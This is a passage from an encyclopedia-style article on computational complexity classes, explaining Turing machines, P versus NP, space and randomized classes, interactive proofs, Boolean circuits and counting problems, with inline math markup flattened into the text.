can be posed asyes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is thenatural numbern{\displaystyle n}prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correctalgorithmwould answer "yes" to. In the primality example,PRIME{\displaystyle {\texttt {PRIME}}}is the set of strings representing natural numbers that, when input into a computer running an algorithm that correctlytests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no". While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2]Other types of problems that certain complexity classes are defined in terms of include: To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of acomputational model. Computational models make exact the notions of computational resources like "time" and "memory". Incomputational complexity theory, complexity classes deal with theinherentresource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing an abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences inprocessorspeed) that obstruct an understanding of fundamental principles. The most commonly used computational model is theTuring machine. While other models exist and many complexity classes are defined in terms of them (see section"Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory likebytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below. It is also possible to use theBlum axiomsto define complexity classes without referring to a concretecomputational model, but this approach is less frequently used in complexity theory. ATuring machineis a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as theChurch–Turing thesis); this means that it is believed thateveryalgorithm can be represented as a Turing machine. Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic"). A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problemPRIME{\displaystyle {\texttt {PRIME}}}from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctlytests for primalityaccepts. A Turing machine is said torecognizea language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language and is said todecidea language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, sodecidabilityplaces the additional constraint overrecognizabilitythat the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language. Turing machines enable intuitive notions of "time" and "space". Thetime complexityof a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. Thespace complexityis the number of cells on its tape that it uses to reach either an accept or reject state. The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step (see image). If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3]NTMs are not meant to be physically realizable models, they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions). Thetime complexityof an NTM is the maximum number of steps that the NTM uses onanybranch of its computation.[4]Similarly, thespace complexityof an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism. Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory. Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated byupper boundson the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with therate of growthin the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity classPgrows at apolynomialrate as the input size increases, which is comparatively slow compared to problems in the exponential complexity classEXPTIME(or more accurately, for problems inEXPTIMEthat are outside ofP, sinceP⊆EXPTIME{\displaystyle {\mathsf {P}}\subseteq {\mathsf {EXPTIME}}}). Note that the study of complexity classes is intended primarily to understand theinherentcomplexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into and are therefore concerned with identifying which class a computational problem falls into using themost efficientalgorithm. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial. Thetime complexityof an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functiontM:N→N{\displaystyle t_{M}:\mathbb {N} \to \mathbb {N} }, wheretM(n){\displaystyle t_{M}(n)}is the maximum number of steps thatM{\displaystyle M}takes on any input of lengthn{\displaystyle n}. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function apolynomial? Alogarithmic function? Anexponential function? Or another kind of function? Thespace complexityof an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functionsM:N→N{\displaystyle s_{M}:\mathbb {N} \to \mathbb {N} }, wheresM(n){\displaystyle s_{M}(n)}is the maximum number of cells thatM{\displaystyle M}uses on any input of lengthn{\displaystyle n}. Complexity classes are often defined using granular sets of complexity classes calledDTIMEandNTIME(for time complexity) andDSPACEandNSPACE(for space complexity). Usingbig O notation, they are defined as follows: Pis the class of problems that are solvable by adeterministic Turing machineinpolynomial timeandNPis the class of problems that are solvable by anondeterministic Turing machinein polynomial time. Or more formally, Pis often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since thetime complexityof solving a problem inPincreases relatively slowly with the input size. An important characteristic of the classNPis that it can be equivalently defined as the class of problems whose solutions areverifiableby a deterministic Turing machine in polynomial time. That is, a language is inNPif there exists adeterministicpolynomial time Turing machine, referred to as the verifier, that takes as input a stringw{\displaystyle w}anda polynomial-sizecertificatestringc{\displaystyle c}, and acceptsw{\displaystyle w}ifw{\displaystyle w}is in the language and rejectsw{\displaystyle w}ifw{\displaystyle w}is not in the language. Intuitively, the certificate acts as aproofthat the inputw{\displaystyle w}is in the language. Formally:[5] This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection betweennondeterminismand solution verifiability. Furthermore, it also provides a useful method for proving that a language is inNP—simply identify a suitable certificate and show that it can be verified in polynomial time. While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable,PandNPare actually at the center of one of the most famous unsolved problems in computer science: thePversusNPproblem. While it is known thatP⊆NP{\displaystyle {\mathsf {P}}\subseteq {\mathsf {NP}}}(intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or under the verifier definition,Pis the class of problems whose polynomial time verifiers need only receive the empty string as their certificate), it is not known whetherNPis strictly larger thanP. IfP=NP, then it follows that nondeterminism providesno additional computational powerover determinism with regards to the ability to quickly find a solution to a problem; that is, being able to exploreall possible branchesof computation providesat mosta polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can be quickly be checked for correctness (that is, if the problem is inNP), then there also exists an algorithm that can quicklyconstructthat proof (that is, the problem is inP).[6]However, the overwhelming majority of computer scientists believe thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}},[7]and mostcryptographic schemesemployed today rely on the assumption thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[8] EXPTIME(sometimes shortened toEXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time andNEXPTIME(sometimes shortened toNEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally, EXPTIMEis a strict superset ofPandNEXPTIMEis a strict superset ofNP. It is further the case thatEXPTIME⊆{\displaystyle \subseteq }NEXPTIME. It is not known whether this is proper, but ifP=NPthenEXPTIMEmust equalNEXPTIME. While it is possible to definelogarithmictime complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (becauselog⁡n<n{\displaystyle \log n<n}).[a][9]However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require atwo-tape Turing machineso that it is possible for the machine to store the entire input (it can be shown that in terms ofcomputabilitythe two-tape Turing machine is equivalent to the single-tape Turing machine).[10]In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape. L(sometimes lengthened toLOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine andNL(sometimes lengthened toNLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10] It is known thatL⊆NL⊆P{\displaystyle {\mathsf {L}}\subseteq {\mathsf {NL}}\subseteq {\mathsf {P}}}. However, it is not known whether any of these relationships is proper. The complexity classesPSPACEandNPSPACEare the space analogues toPandNP. That is,PSPACEis the class of problems solvable in polynomial space by a deterministic Turing machine andNPSPACEis the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally, While it is not known whetherP=NP,Savitch's theoremfamously showed thatPSPACE=NPSPACE. It is also known thatP⊆PSPACE{\displaystyle {\mathsf {P}}\subseteq {\mathsf {PSPACE}}}, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected thatPis strictly smaller thanPSPACE, but this has not been proven. The complexity classesEXPSPACEandNEXPSPACEare the space analogues toEXPTIMEandNEXPTIME. That is,EXPSPACEis the class of problems solvable in exponential space by a deterministic Turing machine andNEXPSPACEis the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally, Savitch's theoremshowed thatEXPSPACE=NEXPSPACE. This class is extremely broad: it is known to be a strict superset ofPSPACE,NP, andP, and is believed to be a strict superset ofEXPTIME. Complexity classes have a variety ofclosureproperties. For example, decision classes may be closed undernegation,disjunction,conjunction, or even under allBoolean operations. Moreover, they might also be closed under a variety of quantification schemes.P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes—one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other. Each classXthat is not closed under negation has a complement classco-X, which consists of the complements of the languages contained inX(i.e.co-X={L|L¯∈X}{\displaystyle {\textsf {co-X}}=\{L|{\overline {L}}\in {\mathsf {X}}\}}).co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whetherco-NP=NP. Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11]Take, for example, a problem that can be solved inO(n){\displaystyle O(n)}time (that is, in linear time) and one that can be solved in, at best,O(n1000){\displaystyle O(n^{1000})}time. Both of these problems are inP, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, likeO(n3){\displaystyle O(n^{3})}, rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance,O(n3)∘O(n2)=O(n6){\displaystyle O(n^{3})\circ O(n^{2})=O(n^{6})}, which is a polynomial butO(n6)>O(n3){\displaystyle O(n^{6})>O(n^{3})}).[11]Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12](Note that the definition ofPis also useful because, empirically, almost all problems inPthat are practically useful do in fact have low order polynomial runtimes, and almost all problems outside ofPthat are practically useful do not have any known algorithms with small exponential runtimes, i.e. withO(cn){\displaystyle O(c^{n})}runtimes wherecis close to 1.[13]) Many complexity classes are defined using the concept of areduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 additionx+y{\displaystyle x+y}to base-2 addition by transformingx{\displaystyle x}andy{\displaystyle y}to their base-2 notation (e.g. 5+7 becomes 101+111). Formally, a problemX{\displaystyle X}reduces to a problemY{\displaystyle Y}if there exists a functionf{\displaystyle f}such that for everyx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only iff(x)∈Y{\displaystyle f(x)\in Y}. Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problemX{\displaystyle X}that can be efficiently reduced to another problemY{\displaystyle Y}is no more difficult thanY{\displaystyle Y}. Formally, a problemX{\displaystyle X}is polynomial-time reducible to a problemY{\displaystyle Y}if there exists apolynomial-timecomputable functionp{\displaystyle p}such that for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only ifp(x)∈Y{\displaystyle p(x)\in Y}. Note that reductions can be defined in many different ways. Common reductions areCook reductions,Karp reductionsandLevin reductions, and can vary based on resource bounds, such aspolynomial-time reductionsandlog-space reductions. Reductions motivate the concept of a problem beinghardfor a complexity class. A problemX{\displaystyle X}is hard for a class of problemsCif every problem inCcan be polynomial-time reduced toX{\displaystyle X}. Thus no problem inCis harder thanX{\displaystyle X}, since an algorithm forX{\displaystyle X}allows us to solve any problem inCwith at most polynomial slowdown. Of particular importance, the set of problems that are hard forNPis called the set ofNP-hardproblems. If a problemX{\displaystyle X}is hard forCand is also inC, thenX{\displaystyle X}is said to becompleteforC. This means thatX{\displaystyle X}is the hardest problem inC(since there could be many problems that are equally hard, more preciselyX{\displaystyle X}is as hard as the hardest problems inC). Of particular importance is the class ofNP-completeproblems—the most difficult problems inNP. Because all problems inNPcan be polynomial-time reduced toNP-complete problems, finding anNP-complete problem that can be solved in polynomial time would mean thatP=NP. Savitch's theorem establishes the relationship between deterministic and nondetermistic space resources. It shows that if a nondeterministic Turing machine can solve a problem usingf(n){\displaystyle f(n)}space, then a deterministic Turing machine can solve the same problem inf(n)2{\displaystyle f(n)^{2}}space, i.e. in the square of the space. Formally, Savitch's theorem states that for anyf(n)>n{\displaystyle f(n)>n},[14] Important corollaries of Savitch's theorem are thatPSPACE=NPSPACE(since the square of a polynomial is still a polynomial) andEXPSPACE=NEXPSPACE(since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space. By definition ofDTIME, it follows thatDTIME(nk1){\displaystyle {\mathsf {DTIME}}(n^{k_{1}})}is contained inDTIME(nk2){\displaystyle {\mathsf {DTIME}}(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}, sinceO(nk1)⊆O(nk2){\displaystyle O(n^{k_{1}})\subseteq O(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much more additional time or space is needed in order to increase the number of problems that can be solved. Thetime hierarchy theoremstates that Thespace hierarchy theoremstates that The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes thatPis strictly contained inEXPTIME, and the space hierarchy theorem establishes thatLis strictly contained inPSPACE. While deterministic and non-deterministicTuring machinesare the most commonly used models of computation, many complexity classes are defined in terms of other computational models. In particular, These are explained in greater detail below. A number of important complexity classes are defined using theprobabilistic Turing machine, a variant of theTuring machinethat can toss random coins. These classes help to better describe the complexity ofrandomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probabilityϵ{\displaystyle \epsilon }. A probabilistic Turing machineM{\displaystyle M}is said to recognize a languageL{\displaystyle L}with error probabilityϵ{\displaystyle \epsilon }if: The fundamental randomized time complexity classes areZPP,RP,co-RP,BPP, andPP. The strictest class isZPP(zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demandsno error whatsoever. A slightly looser class isRP(randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is inRPif there is a probabilistic polynomial-time Turing machineM{\displaystyle M}such that if a string is not in the language thenM{\displaystyle M}always rejects and if a string is in the language thenM{\displaystyle M}accepts with a probability at least 1/2. The classco-RPis similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classesRPandco-RPencompass all of the problems that can be solved by probabilistic Turing machines withone-sided error. Loosening the error requirements further to allow fortwo-sided erroryields the classBPP(bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language).BPPis the most practically relevant of the probabilistic complexity classes—problems inBPPhave efficientrandomized algorithmsthat can be run quickly on real computers.BPPis also at the center of the important unsolved problem in computer science over whetherP=BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown. The broadest class of efficiently-solvable probabilistic problems isPP(probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings. ZPP,RPandco-RPare all subsets ofBPP, which in turn is a subset ofPP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, andPPsimply relaxes the error probability ofBPP.ZPPrelates toRPandco-RPin the following way:ZPP=RP∩co-RP{\displaystyle {\textsf {ZPP}}={\textsf {RP}}\cap {\textsf {co-RP}}}. That is,ZPPconsists exactly of those problems that are in bothRPandco-RP. Intuitively, this follows from the fact thatRPandco-RPallow only one-sided error:co-RPdoes not allow error for strings in the language andRPdoes not allow error for strings not in the language. Hence, if a problem is in bothRPandco-RP, then there must be no error for strings both inandnot in the language (i.e. no error whatsoever), which is exactly the definition ofZPP. Important randomized space complexity classes includeBPL,RL, andRLP. A number of complexity classes are defined usinginteractive proof systems. Interactive proofs generalize the proofs definition of the complexity classNPand yield insights intocryptography,approximation algorithms, andformal verification. Interactive proof systems areabstract machinesthat model computation as the exchange of messages between two parties: a proverP{\displaystyle P}and a verifierV{\displaystyle V}. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The proverP{\displaystyle P}has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomially-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15] The classNPis a simple proof system in which the verifier is restricted to being a deterministic polynomial-timeTuring machineand the procedure is restricted to one round (that is, the prover sends only a single, full proof—typically referred to as thecertificate—to the verifier). Put another way, in the definition of the classNP(the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) is a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason,NPcan also be calleddIP(deterministic interactive proof), though it is rarely referred to as such. It turns out thatNPcaptures the full power of interactive proof systems with deterministic (polynomial-time) verifiers because it can be shown that for any proof system with a deterministic verifier it is never necessary to need more than a single round of messaging between the prover and the verifier. Interactive proof systems that provide greater computational power over standard complexity classes thus requireprobabilisticverifiers, which means that the verifier's questions to the prover are computed usingprobabilistic algorithms. As noted in the section above onrandomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probabilityϵ{\displaystyle \epsilon }. The most general complexity class arising out of this characterization is the classIP(interactive polynomial time), which is the class of all problems solvable by an interactive proof system(P,V){\displaystyle (P,V)}, whereV{\displaystyle V}is probabilistic polynomial-time and the proof system satisfies two properties: for a languageL∈IP{\displaystyle L\in {\mathsf {IP}}} An important feature ofIPis that it equalsPSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by adeterministic Turing machinewith polynomial space resources, and vice versa. A modification of the protocol forIPproduces another important complexity class:AM(Arthur–Merlin protocol). In the definition of interactive proof systems used byIP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation—it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are calledprivate random coins. The interactive proof system can be constrained so that the coins used by the verifier arepublic random coins; that is, the prover is able to see the coins. Formally,AMis defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover.AMcan be generalized toAM[k], wherekis the number of messages exchanged (so in the generalized form the standardAMdefined above isAM[2]). However, it is the case that for allk≥2{\displaystyle k\geq 2},AM[k]=AM[2]. It is also the case thatAM[k]⊆IP[k]{\displaystyle {\mathsf {AM}}[k]\subseteq {\mathsf {IP}}[k]}. Other complexity classes defined using interactive proof systems includeMIP(multiprover interactive polynomial time) andQIP(quantum interactive polynomial time). An alternative model of computation to theTuring machineis theBoolean circuit, a simplified model of thedigital circuitsused in moderncomputers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model fornon-uniform computation(computation in which different input sizes within the same problem use different algorithms). Formally, a Boolean circuitC{\displaystyle C}is adirected acyclic graphin which edges represent wires (which carry thebitvalues 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices representlogic gates(generally theAND,OR, andNOT gates). One logic gate is designated the output gate, and represents the end of the computation. The input/output behavior of a circuitC{\displaystyle C}withn{\displaystyle n}input variables is represented by theBoolean functionfC:{0,1}n→{0,1}{\displaystyle f_{C}:\{0,1\}^{n}\to \{0,1\}}; for example, on input bitsx1,x2,...,xn{\displaystyle x_{1},x_{2},...,x_{n}}, the output bitb{\displaystyle b}of the circuit is represented mathematically asb=fC(x1,x2,...,xn){\displaystyle b=f_{C}(x_{1},x_{2},...,x_{n})}. The circuitC{\displaystyle C}is said tocomputethe Boolean functionfC{\displaystyle f_{C}}. Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size.Languages(the formal representations ofdecision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by acircuit family. A circuit family is an infinite list of circuits(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}, whereCn{\displaystyle C_{n}}is a circuit withn{\displaystyle n}input variables. A circuit family is said to decide a languageL{\displaystyle L}if, for every stringw{\displaystyle w},w{\displaystyle w}is in the languageL{\displaystyle L}if and only ifCn(w)=1{\displaystyle C_{n}(w)=1}, wheren{\displaystyle n}is the length ofw{\displaystyle w}. In other words, a stringw{\displaystyle w}of sizen{\displaystyle n}is in the language represented by the circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}if the circuitCn{\displaystyle C_{n}}(the circuit with the same number of input vertices as the number of bits inw{\displaystyle w}) evaluates to 1 whenw{\displaystyle w}is its input. While complexity classes defined using Turing machines are described in terms oftime complexity, circuit complexity classes are defined in terms of circuit size — the number of vertices in the circuit. The size complexity of a circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}is the functionf:N→N{\displaystyle f:\mathbb {N} \to \mathbb {N} }, wheref(n){\displaystyle f(n)}is the circuit size ofCn{\displaystyle C_{n}}. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the functionf{\displaystyle f}is apolynomial. The complexity classP/polyis the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, requires relatively few sequential operations on a Turing machine), also has a small circuit complexity (that is, requires relatively few Boolean operations). Formally, it can be shown that if a language is inDTIME(t(n)){\displaystyle {\mathsf {DTIME}}(t(n))}, wheret{\displaystyle t}is a functiont:N→N{\displaystyle t:\mathbb {N} \to \mathbb {N} }, then it has circuit complexityO(t2(n)){\displaystyle O(t^{2}(n))}.[16]It follows directly from this fact thatP⊂P/poly{\displaystyle {\mathsf {\color {Blue}P}}\subset {\textsf {P/poly}}}. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e.P⊊P/poly{\displaystyle {\textsf {P}}\subsetneq {\textsf {P/poly}}}(for example, there are someundecidable problemsthat are inP/poly). P/polyhas a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related toPversusNP. For example, if there is any language inNPthat is not inP/poly, thenP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[17]P/polyis also helpful in investigating properties of thepolynomial hierarchy. For example, ifNP⊆P/poly, thenPHcollapses toΣ2P{\displaystyle \Sigma _{2}^{\mathsf {P}}}. A full description of the relations betweenP/polyand other complexity classes is available at "Importance of P/poly".P/polyis also helpful in the general study of the properties ofTuring machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-boundedadvice function. Two subclasses ofP/polythat have interesting properties in their own right areNCandAC. These classes are defined not only in terms of their circuit size but also in terms of theirdepth. The depth of a circuit is the length of the longestdirected pathfrom an input node to the output node. The classNCis the set of languages that can be solved by circuit families that are restricted not only to having polynomial-size but also to having polylogarithmic depth. The classACis defined similarly toNC, however gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits).NCis a notable class because it can be equivalently defined as the class of languages that have efficientparallel algorithms. The classesBQPandQMA, which are of key importance inquantum information science, are defined usingquantum Turing machines. While most complexity classes studied by computer scientists are sets ofdecision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting ofcounting problems,function problems, andpromise problems. These are explained in greater detail below. Acounting problemasks not onlywhethera solution exists (as with adecision problem), but askshow manysolutions exist.[18]For example, the decision problemCYCLE{\displaystyle {\texttt {CYCLE}}}askswhethera particular graphG{\displaystyle G}has asimple cycle(the answer is a simple yes/no); the corresponding counting problem#CYCLE{\displaystyle \#{\texttt {CYCLE}}}(pronounced "sharp cycle") askshow manysimple cyclesG{\displaystyle G}has.[19]The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20] Thus, whereas decision problems are represented mathematically asformal languages, counting problems are represented mathematically asfunctions: a counting problem is formalized as the functionf:{0,1}∗→N{\displaystyle f:\{0,1\}^{*}\to \mathbb {N} }such that for every inputw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}},f(w){\displaystyle f(w)}is the number of solutions. For example, in the#CYCLE{\displaystyle \#{\texttt {CYCLE}}}problem, the input is a graphG∈{0,1}∗{\displaystyle G\in \{0,1\}^{*}}(a graph represented as a string ofbits) andf(G){\displaystyle f(G)}is the number of simple cycles inG{\displaystyle G}. Counting problems arise in a number of fields, includingstatistical estimation,statistical physics,network design, andeconomics.[21] #P(pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version ofNP.[22]The connection toNParises from the fact that the number of solutions to a problem equals the number of accepting branches in anondeterministic Turing machine's computation tree.#Pis thus formally defined as follows: And just asNPcan be defined both in terms of nondeterminism and in terms of a verifier (i.e. as aninteractive proof system), so too can#Pbe equivalently defined in terms of a verifier. Recall that a decision problem is inNPif there exists a polynomial-time checkablecertificateto a given problem instance—that is,NPasks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class#Paskshow manysuch certificates exist.[22]In this context,#Pis defined as follows: Counting problems are a subset of a broader class of problems calledfunction problems. A function problem is a type of problem in which the values of afunctionf:A→B{\displaystyle f:A\to B}are computed. Formally, a function problemf{\displaystyle f}is defined as a relationR{\displaystyle R}over strings of an arbitraryalphabetΣ{\displaystyle \Sigma }: An algorithm solvesf{\displaystyle f}if for every inputx{\displaystyle x}such that there exists ay{\displaystyle y}satisfying(x,y)∈R{\displaystyle (x,y)\in R}, the algorithm produces one suchy{\displaystyle y}. This is just another way of saying thatf{\displaystyle f}is afunctionand the algorithm solvesf(x){\displaystyle f(x)}for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}}. An important function complexity class isFP, the class of efficiently solvable functions.[23]More specifically,FPis the set of function problems that can be solved by adeterministic Turing machineinpolynomial time.[23]FPcan be thought of as the function problem equivalent ofP. Importantly,FPprovides some insight into both counting problems andPversusNP. If#P=FP, then the functions that determine the number of certificates for problems inNPare efficiently solvable. And since computing the number of 